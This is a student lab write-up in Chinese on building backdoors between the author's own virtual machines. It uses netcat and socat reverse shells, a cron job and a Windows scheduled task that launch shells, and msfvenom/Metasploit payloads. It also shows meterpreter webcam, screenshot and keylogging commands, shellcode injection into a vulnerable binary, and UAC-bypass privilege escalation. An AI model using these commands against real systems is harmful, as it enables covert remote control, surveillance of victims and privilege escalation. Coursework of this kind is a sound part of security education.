文章目录
实验内容
实验目标
本周的实验主要有以下五个方面的内容:
(1)使用netcat获取主机操作Shell,cron启动某项任务(cron是linux下用来周期性的执行某种任务或等待处理某些事件的一个守护进程);
(2)使用socat获取主机操作Shell, 任务计划启动;
(3)使用MSF meterpreter(或其他软件)生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell;
(4)使用MSF meterpreter(或其他软件)生成获取目标主机音频、摄像头、击键记录等内容,并尝试提权;
(5)使用MSF生成shellcode,注入到实践1中的pwn1中,获取反弹连接Shell。
回答问题
(1)例举你能想到的一个后门进入到你系统中的可能方式?
黑客可能通过网页后门入侵你的系统,网页后门伪装成正常的web服务器,建立连接后利用某种脚本漏洞上传脚本后门,然后进行系统入侵与权限提升。
(2)例举你知道的后门如何启动起来(win及linux)的方式?
win:设置触发器通过事件启动后门程序;系统植入后门程序,或者和其他文件绑定,用户点击后启动后门。
Linux:shellcode注入pwn文件执行启动后门。
(3)Meterpreter有哪些给你映像深刻的功能?
后门程序启动后,可以轻易获取设备控制权,进行摄像、录像、截屏、获取键盘动作等操作,若被非法使用将严重侵犯受害者隐私。
(4)如何发现自己系统有没有被安装后门?
可以通过检查系统中运行的任务,及启动的进程,看看是否有后门程序;还可以检查系统日志,判断有没有入侵痕迹等。
实验环境
windows主机:win11系统;虚拟机平台:VMware workstation pro;Linux主机:VMware平台下的kali-11.x系统
实验过程
使用netcat获取主机操作Shell,cron启动某项任务
win及linux,使用ncat获取主机操作shell
linux上查看主机ip(192.168.197.130):
win上查看主机ip(192.168.197.1):
点这里下载ncat.zip至win主机,解压后,cmd进入该目录下。
(1)win反弹shell至kali
kali:ncat -lvnp [端口号]
win:ncat.exe [kali主机IP] [同上端口号] -e cmd.exe
(2)kali反弹shell至win
win:ncat.exe -lvnp [端口号]
kali:nc [win主机IP] [同上端口号] -e /bin/sh
linux中cron定时启动任务反弹shell给win
cron是linux下用来周期性的执行某种任务或等待处理某些事件的一个守护进程:
(1)cron编写定时任务
kali中编写cron定时任务:crontab -e
选择编辑方式为vim-basic,按i进入编辑模式
编写一条弹出shell给win主机的指令(* * * * *表示每一分钟执行):
* * * * * /bin/netcat [win主机IP] [win主机开放的端口号] -e /bin/sh
(2)定时任务启动反弹shell
win主机开启相应端口的监听:ncat.exe -lvnp [同上端口号]
kali中启动cron服务:service cron start
发现win中获得了kali主机shell:
回目录
使用socat获取主机操作Shell, 任务计划启动
点击这里下载socat.zip至win主机,解压保存,记录所在路径。
在win上设定任务计划
(1)控制面板 > windows工具 > 任务计划程序:
(2)在右侧操作一栏中选择创建任务,常规 > 名称,填写自定义的任务名称;触发器 > 新建,选择任务的触发事件;操作 > 新建 > 程序或脚本:socat.exe所在的路径;添加参数:tcp-listen:[监听端口] exec:cmd,pty,stderr
。
通过事件触发任务,linux上使用socat获取win的shell
socat相当于ncat的加强版,能够实现双向通信和ssl功能。
(1)在kali主机中输入命令如下:
socat - tcp:[win主机IP]:[端口号与上面参数一致]
(2)在win中触发任务计划启动,发现kali上成功弹出了win主机的shell:
使用MSF meterpreter生成可执行文件,利用ncat传送到主机并运行获取主机Shell
查阅资料,了解相应渗透测试命令的格式。
kali主机上生成后门程序
输入命令:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=[监听端(kali主机)IP] LPORT=[监听端口] -f exe >文件路径/文件名
发现生成后门程序:
利用ncat将后门程序传到win主机
win:ncat.exe -lvnp [监听端口号] > [后门程序名称]
kali:nc [win主机IP] [同上端口号] < [刚生成的后门程序名称]
渗透测试
(1)在kali上利用msfconsole配置渗透测试的相关参数
msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse-tcp
set LHOST [kali主机IP]
set LPORT [监听端口]
##查看选项
show options
##开启测试
exploit
(2)win主机点击运行后门程序,发现kali获得了主机shell
回目录
使用MSF meterpreter获取目标主机音频、摄像头、击键记录等内容,并尝试提权
输入命令获取目标主机音频、摄像头、击键记录等内容
##控制摄像头拍照
webcam shot
##控制摄像头录像
webcam_stream
##截屏
screenshot
##获取击键记录
keyscan_start
##键盘操作
keyscan_dump
获取的内容如下:
尝试提权
使用MSF生成shellcode,注入到实践1中的pwn1中,获取反弹连接Shell
攻击机:kali-11.x
受害机:Ubuntu-18
(1)生成shellcode,打开渗透测试环境
经过上面的学习,我们利用msfvenom生成一段shellcode,如下:
msfvenom -p linux/x86/shell_reverse_tcp LHOST=[kali主机IP] LPORT=[监听端口号] -f c > shellcode
接着配置渗透测试参数:
msfconsole
use exploit/multi/handler
set payload linux/x86
set LHOST [kali主机IP]
set LPORT [监听端口号]
exploit
(2)注入shellcode运行pwn文件
同实验一的步骤,构造需要的payload,将shellcode替换成刚刚生成的代码,注入pwn文件运行如下(回车执行到出现乱码即停止):
(3)成功获取受害机shell反弹:
问题及解决方案
问题:开始时,尝试提权失败
(1)查阅资料尝试提权,输入getsystem自动提权失败:
(2)尝试通过bypassuac提权,绕过uac失败:
(3)弹窗提高程序运行级别,失败:
解决方案:阅读了更深入的参考资料,通过local_exploit_suggester查询哪些exp可以用
-
将当前session放到后台运行:
background
-
切换到local_exploit_suggester模块:
use post/multi/recon/local_exploit_suggester
-
设置session(我的session有1和2两个,只要是有的都可以选择,根据自己情况决定):
set session 2
-
运行模块:
run
-
根据下图选择合适的exp(漏洞利用程序):
use exploit/windows/local/bypassuac_eventvwr
-
查看选项:
show options
-
设置session,运行:
set session 2
run
如图,成功获得windows事件查看器,提权成功:
回目录
学习感悟、思考
本次实验是货真价实的后门构造和漏洞利用实验,我从中学习到了很多新的知识,也积累了不少宝贵的经验。
首先我得说msf真的是一个十分强大的渗透测试工具,这次实验的重点难点都集中在这里,我也手输了许许多多msf的相关命令,部分已经颇为熟稔了。
实验中确实碰到了一些困难,也花费了很多精力与时间,但最大的挑战是meterpreter尝试提权的那个部分,按照传统做法并不能行得通,试了很多方法全部失败,几乎快要放弃了,但是阅读了更为深入的文章后,我又硬着头皮继续研究,学会了查询系统补丁和运行exp程序的方法。
虽然许多概念对我来说都是第一次接触,在过程中感到很痛苦,但终究还是尝试去理解与运用,完成了试验任务。尽管基本完成了试验任务,却也给我之前那种不深入理解原理、照本宣科的做法宣布了死刑,在以后的实验里我一定要充分了解相关原理,在理解的基础上进行实现与创新。
参考资料
- https://blog.csdn.net/qq_45951598/article/details/118031781#:~:text=msf%20windows%E6%8F%90%E6%9D%83%E6%96%B9%E6%B3%95%E6%80%BB%E7%BB%93%201%201.getsystem%202,2.bypassuac%203%203.%E5%86%85%E6%A0%B8%E6%8F%90%E6%9D%83%204%204.%E4%BB%A4%E7%89%8C%E6%93%8D%E7%BA%B5
- https://gitee.com/wildlinux/NetSec/attach_fileshttps://gitee.com/wildlinux/NetSec/attach_files
- https://blog.csdn.net/qq_40884727/article/details/100567586https://blog.csdn.net/qq_40884727/article/details/100567586
- https://blog.csdn.net/qq_48985780/article/details/121441548https://blog.csdn.net/qq_48985780/article/details/121441548